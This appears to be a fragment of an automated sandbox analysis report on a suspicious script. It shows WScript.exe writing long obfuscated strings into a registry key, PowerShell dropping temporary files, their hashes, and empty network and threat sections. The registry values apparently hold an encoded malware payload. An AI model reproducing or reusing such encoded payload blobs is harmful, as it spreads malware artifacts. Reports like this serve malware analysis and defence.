davrvvpucvouviffwucidpvrvvtwdrtwcsffwupcdavrvvpucvouviffwubrdpvrvvtwdrtwcsffwuopdavrvvpucvouviffwusedpvrvvtwdrtwcsffwuiydavrvvpucvouviffwupadpvrvvtwdrtwcsffwuuvdavrvvpucvouviffwuoidpvrvvtwdrtwcsffwutcdavrvvpucvouviffwuirdpvrvvtwdrtwcsffwurpdavrvvpucvouviffwuyedpvrvvtwdrtwcsffwuwydavrvvpucvouviffwutadpvrvvtwdrtwcsffwuvvdavrvvpucvouviffwuridpvrvvtwdrtwcsffwuecdsvrvvpucvouviffwuwrdpvrvvtwdrtwcsffwudpdsvrvvpucvouviffwufedovrvvtwdrtwcsffwucydsvrvvpucvouviffwueadovrvvtwdrtwcsffwubvdsvrvvpucvouviffwudidovrvvtwdrtwcsffwuscdsvrvvpucvouviffwucrdovrvvtwdrtwcsffwuppdsvrvvpucvouviffwuaedovrvvtwdrtwcsffwuoydsvrvvpucvouviffwusadovrvvtwdrtwcsffwuivdsvrvvpucvouviffwupidovrvvtwdrtwcsffwuycdsvrvvpucvouviffwuordovrvvtwdrtwcsffwutpdsvrvvpucvouviffwuuedovrvvtwdrtwcsffwurydsvrvvpucvouviffwuyadovrvvtwdrtwcsffwuwvdsvrvvpucvouviffwutidovrvvtwdrtwcsffwufcdpvrvvpucvouviffwurrdovrvvtwdrtwcsffwuepdpvrvvpucvouviffwuvedovrvvtwdrtwcsffwudydpvrvvpucvouviffwufadivrvvtwdrtwcsffwucvdpvrvvpucvouviffwueidivrvvtwdrtwcsffwuacdpvrvvpucvouviffwudrdivrvvtwdrtwcsffwuspdpvrvvpucvouviffwubedivrvvtwdrtwcsffwupydpvrvvpucvouviffwuaadivrvvtwdrtwcsffwuovdpvrvvpucvouviffwusidivrvvtwdrtwcsffwuucdpvrvvpucvouviffwuprdivrvvtwdrtwcsffwuypdpvrvvpucvouviffwuiedivrvvtwdrtwcsffwutydpvrvvpucvouviffwuuadivrvvtwdrtwcsffwurvdpvrvvpucvouviffwuyidivrvvtwdrtwcsffwuvcdpvrvvpucvouviffwutrdivrvvtwdrtwcsffwufpdovrvvpucvouviffwuwedivrvvtwdrtwcsffwueydovrvvpucvouviffwuvadivrvvtwdrtwcsffwudvdovrvvpucvouviffwufiduvrvvtwdrtwcsffwubcdovrvvpucvouviffwuerduvrvvtwdrtwcsffwuapdovrvvpucvouviffwuceduvrvvtwdrtwcsffwusydovrvvpucvouviffwubaduvrvvtwdrtwcsffwupv
(PID) Process:(2900) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\admin
Operation:writeName:8
Value:
dovrvvpucvouviffwuaiduvrvvtwdrtwcsffwuicdovrvvpucvouviffwusrduvrvvtwdrtwcsffwuupdovrvvpucvouviffwuoeduvrvvtwdrtwcsffwuyydovrvvpucvouviffwuiaduvrvvbsawerfuvuepepopvrvvyppucvvfpyueirvrvvtwdrppwywvypffcryppwfaawerfuvuoufwyppscwepviosvrvvtwdrtwcsffwuvydovrvvpucvouviffwuraduvrvvtwdrtwcsffwufvdivrvvpucvouviffwuwiduvrvvtwdrtwcsffwudcdivrvvpucvouviffwuvrduvrvvtwdrtwcsffwucpdivrvvpucvouviffwueedyvrvvtwdrtwcsffwubydivrvvpucvouviffwudadyvrvvtwdrtwcsffwuavdivrvvpucvouviffwucidyvrvvtwdrtwcsffwupcdivrvvpucvouviffwubrdyvrvvtwdrtwcsffwuopdivrvvpucvouviffwusedyvrvvtwdrtwcsffwuiydivrvvpucvouviffwupadyvrvvtwdrtwcsffwuuvdivrvvpucvouviffwuoidyvrvvtwdrtwcsffwutcdivrvvpucvouviffwuirdyvrvvtwdrtwcsffwurpdivrvvpucvouviffwuyedyvrvvtwdrtwcsffwuwydivrvvpucvouviffwutadyvrvvtwdrtwcsffwuvvdivrvvpucvouviffwuridyvrvvtwdrtwcsffwuecduvrvvpucvouviffwuwrdyvrvvtwdrtwcsffwudpduvrvvpucvouviffwufedtvrvvtwdrtwcsffwucyduvrvvpucvouviffwueadtvrvvtwdrtwcsffwubvduvrvvpucvouviffwudidtvrvvtwdrtwcsffwuscduvrvvpucvouviffwucrdtvrvvtwdrtwcsffwuppduvrvvpucvouviffwuaedtvrvvtwdrtwcsffwuoyduvrvvpucvouviffwusadtvrvvtwdrtwcsffwuivduvrvvpucvouviffwupidtvrvvtwdrtwcsffwuycduvrvvpucvouviffwuordtvrvvtwdrtwcsffwutpduvrvvpucvouviffwuuedtvrvvtwdrtwcsffwuryduvrvvpucvouviffwuyadtvrvvtwdrtwcsffwuwvduvrvvpucvouviffwutidtvrvvtwdrtwcsffwufcdyvrvvpucvouviffwurrdtvrvvtwdrtwcsffwuepdyvrvvpucvouviffwuvedtvrvvtwdrtwcsffwudydyvrvvpucvouviffwufadrvrvvtwdrtwcsffwucvdyvrvvpucvouviffwueidrvrvvtwdrtwcsffwuacdyvrvvpucvouviffwudrdrvrvvtwdrtwcsffwuspdyvrvvpucvouviffwubedrvrvvtwdrtwcsffwupydyvrvvpucvouviffwuaadrvrvvtwdrtwcsffwuovdyvrvvpucvouviffwusidrvrvvtwdrtwcsffwuucdyvrvvpucvouviffwuprdrvrvvtwdrtwcsffwuypdyvrvvpucvouviffwuiedrvrvvtwdrtwcsffwutydyvrvvpucvouviffwuuadrvrvvtwdrtwcsffwurvdyvrvvpucvouviffwuyidrvrvvtwdrtwcsffwuvcdyvrvvpucvouviffwutrdrvrvvtwdrtwcsffwufpdtvrvvpucvouviffwuwedrvrvvtwdrtwcsffwueydtvrvvpucvouviffwuvadrvrvvtwdrtwcsffwudvdtvrvvpucvouviffwufidwvrvvtwdrtwcsffwubcdtvrvvpucvouviffwuerdwvrvvtwdrtwcsffwuapdtvrvvpucvouviffwucedwvrvvtwdrtwcsffwusydtvrvvpucvouviffwubadwvrvvtwdrtwcsffwupvdtvrvvpucvouviffwuaidwvrvvtwdrtwcsffwuicdtvrvvpucvouviffwusrdwvrvvtwdrtwcsffwuupdtvrvvpucvouviffwuoedwvrvvtwdrtwcsffwuyydtvrvvpucvouviffwuiadwvrvvtwdrtwcsffwutvdtvrvvpucvouviffwuuidwvrvvtwdrtwcsffwuwcdtvrvvpucvouviffwuyrdwvrvvtwdrtwcsffwuvpdtvrvvpucvouviffwuredwvrvvtwdrtwcsffwufydrvrvvpucvouviffwuwadwvrvvtwdrtwcsffwuevdrvrvvpucvouviffwuvidwvrvvtwdrtwcsffwuccdrvrvvpucvouviffwufrdvvrvvtwdrtwcsffwubpdrvrvvpucvouviffwudedvvrvvtwdrtwcsffwuaydrvrvvpucvouviffwucadvvrvvtwdrtwcsffwusvdrvrvvpucvouviffwubidvvrvvtwdrtwcsffwuocdrvrvvpucvouviffwuardvvrvvtwdrtwcsffwuipdrvrvvpucvouviffwupedvvrvvtwdrtwcsffwuuydrvrvvpucvouviffwuoadvvrvvtwdrtwcsffwuyvdrvrvvpucvouviffwuiidvvrvvtwdrtwcsffwurcdrvrvvpucvouviffwuurdvvrvvtwdrtwcsffwuwpdrvrvvpucvouviffwutedvvrvvtwdrtwcsffwuvydrvrvvpucvouviffwuradvvrvvtwdrtwcsffwufvdwvrvvpucvouviffwuwidvvrvvtwdrtwcsffwudcdwvrvvpucvouviffwuvrdvvrvvtwdrtwcsffwucpdwvrvvpucvouviffwueecfvrvvtwdrtwcsffwubydwvrvvpucvouviffwudacfvrvvtwdrtwcsffwuavdwvrvvpucvouviffwucicfvrvvtwdrtwcsffwupcdwvrvvpucvouviffwubrcfvrvvtwdrtwcsffwuopdwvrvvpucvouviffwusecfvrvvtwdrtwcsffwuiydwvrvvpucvouviffwupacfvrvvtwdrtwcsffwuuvdwvrvvpucvouviffwuoicfvrvvtwdrtwcsffwutcdwvrvvpucvouviffwuircfvrvvtwdrtwcsffwurpdwvrvvpucvouviffwuyecfvrvvtwdrtwcsffwuwydwvrvvpucvouviffwutacfvrvvtwdrtwcsffwuvvdwvrvvpucvouviffwuricfvrvvtwdrtwcsffwuecdvvrvvpucvouviffwuwrcfvrvvtwdrtwcsffwudpdvvrvvpucvouviffwufecevrvvtwdrtwcsffwucydvvrvvpucvouviffwueacevrvvtwdrtwcsffwubvdvvrvvpucvouviffwudicevrvvtwdrtwcsffwuscdvvrvvpucvouviffwucrcevrvvtwdrtwcsffwuppdvvrvvpucvouviffwuaecevrvvtwdrtwcsffwuoydvvrvvpucvouviffwusacevrvvtwdrtwcsffwuivdvvrvvpucvouviffwupicevrvvtwdrtwcsffwuycdvvrvvpucvouviffwuorcevrvvtwdrtwcsffwutpdvvrvvpucvouviffwuuecevrvvtwdrtwcsffwurydvvrvvpucvouviffwuyacevrvvtwdrtwcsffwuwvdvvrvvpucvouviffwuticevrvvtwdrtwcsffwufccfvrvvpucvouviffwurrcevrvvtwdrtwcsffwuepcfvrvvpucvouviffwuvecevrvvtwdrtwcsffwudycfvrvvpucvouviffwufacdvrvvtwdrtwcsffwucvcfvrvvpucvouviffwueicdvrvvtwdrtw
Executable files
0
Suspicious files
5
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
2620powershell.exeC:\Users\admin\AppData\Local\Temp\1jg3ekho.32v.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2104powershell.exeC:\Users\admin\AppData\Local\Temp\uq4hoakr.tyh.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2620powershell.exeC:\Users\admin\AppData\Local\Temp\tyz0jkrl.fpw.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2104powershell.exeC:\Users\admin\AppData\Local\Temp\4qmqvz3x.k1h.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2620powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivedbf
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
2620powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:1068BF0B9B98C206F587A7DB05F6DD06
SHA256:534478EDAFC5087DAA3749624454988B1F7DF923BF1A0A9E28C5F97C3308CFDB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info